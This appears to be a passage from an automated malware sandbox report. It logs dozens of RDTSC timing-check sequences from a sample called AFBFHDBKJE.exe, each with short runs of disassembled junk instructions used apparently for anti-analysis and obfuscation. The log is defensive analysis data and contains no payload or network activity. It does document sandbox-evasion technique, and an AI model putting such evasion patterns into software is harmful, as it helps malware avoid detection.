Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3467CE second address: 3467D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34693C second address: 346942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346942 second address: 34695F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7FDD3F186Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34695F second address: 346963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346963 second address: 34699A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7FDD3F1868h 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F7FDD3F1874h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F7FDD3F186Ch 0x00000018 jng 00007F7FDD3F186Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B23 second address: 346B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD229Ch 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B33 second address: 346B38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 346B38 second address: 346B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34ACAC second address: 34ACB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34F67C second address: 34F6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD229Ah 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7FDCFD22A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 350497 second address: 3504A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F7FDD3F1868h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 34EDDB second address: 34EE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7FDCFD22A4h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7FDCFD22A3h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 353BF6 second address: 353C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1870h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7FDD3F1875h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 353C23 second address: 353C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 356BD7 second address: 356C15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDD3F186Ch 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F7FDD3F1877h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007F7FDD3F1870h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3567E7 second address: 3567EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3567EB second address: 3567EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597A5 second address: 3597AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597AF second address: 3597B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7FDD3F1866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597B9 second address: 3597C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597C2 second address: 3597DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F7FDD3F186Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3597DA second address: 3597E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359925 second address: 35992A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35992A second address: 359930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359930 second address: 35993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDD3F1866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35993C second address: 359944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359944 second address: 359952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359952 second address: 359956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 359956 second address: 359980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7FDD3F1874h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBC7 second address: 35FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBCC second address: 35FBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBD2 second address: 35FBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7FDCFD2296h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35FBDC second address: 35FC01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ah 0x00000007 jnp 00007F7FDD3F1866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jl 00007F7FDD3F1866h 0x00000016 push edx 0x00000017 pop edx 0x00000018 jns 00007F7FDD3F1866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2C8D1E second address: 2C8D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD22A5h 0x00000009 jg 00007F7FDCFD2296h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F33F second address: 35F35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7FDD3F1878h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F35D second address: 35F37E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7FDCFD22A7h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F37E second address: 35F38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F7FDD3F1872h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 35F8ED second address: 35F91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDCFD22A7h 0x00000008 je 00007F7FDCFD2296h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F7FDCFD229Bh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D6C second address: 362D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D70 second address: 362D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 362D74 second address: 362D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDD3F1879h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36308A second address: 36309B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7FDCFD2296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36309B second address: 3630A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 369203 second address: 36920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367D8F second address: 367DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1874h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367DAA second address: 367DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 367DAF second address: 367DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36804F second address: 36806E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7FDCFD22A7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36806E second address: 368080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368080 second address: 368091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F7FDCFD2296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368091 second address: 3680A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 ja 00007F7FDD3F1866h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3680A2 second address: 3680B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7FDCFD229Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30FBA1 second address: 30FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 popad 0x0000000a jp 00007F7FDD3F1868h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7FDD3F186Dh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 368F1D second address: 368F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F7FDCFD2296h 0x00000009 jmp 00007F7FDCFD22A3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6BC second address: 36E6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6C2 second address: 36E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E6C8 second address: 36E6E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7FDD3F1870h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E81D second address: 36E823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E823 second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E968 second address: 36E96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E96D second address: 36E98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7FDD3F1866h 0x00000009 jnp 00007F7FDD3F1866h 0x0000000f jmp 00007F7FDD3F186Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E98C second address: 36E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7FDCFD229Ah 0x0000000e pushad 0x0000000f jl 00007F7FDCFD2296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36E9A8 second address: 36E9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F00A second address: 36F013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F305 second address: 36F309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F309 second address: 36F30F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F30F second address: 36F315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F315 second address: 36F31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F31B second address: 36F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5B6 second address: 36F5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5BF second address: 36F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5C5 second address: 36F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5CC second address: 36F5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5D1 second address: 36F5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F8FD second address: 36F902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FB86 second address: 36FB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FB9F second address: 36FBEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1878h 0x0000000d jc 00007F7FDD3F1866h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F7FDD3F186Ah 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FEA6 second address: 36FEB6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7FDCFD2296h 0x00000008 jng 00007F7FDCFD2296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FEB6 second address: 36FEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374F16 second address: 374F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 jg 00007F7FDCFD2298h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F7FDCFD229Ah 0x00000017 pushad 0x00000018 jmp 00007F7FDCFD22A7h 0x0000001d pushad 0x0000001e popad 0x0000001f jl 00007F7FDCFD2296h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374F63 second address: 374F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3740F6 second address: 374102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37495C second address: 37496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37496E second address: 374978 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374ACF second address: 374AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1878h 0x00000007 jc 00007F7FDD3F186Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374AF3 second address: 374B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7FDCFD229Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B0B second address: 374B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007F7FDD3F1866h 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007F7FDD3F1866h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B21 second address: 374B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F7FDCFD2296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B2F second address: 374B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7FDD3F1866h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
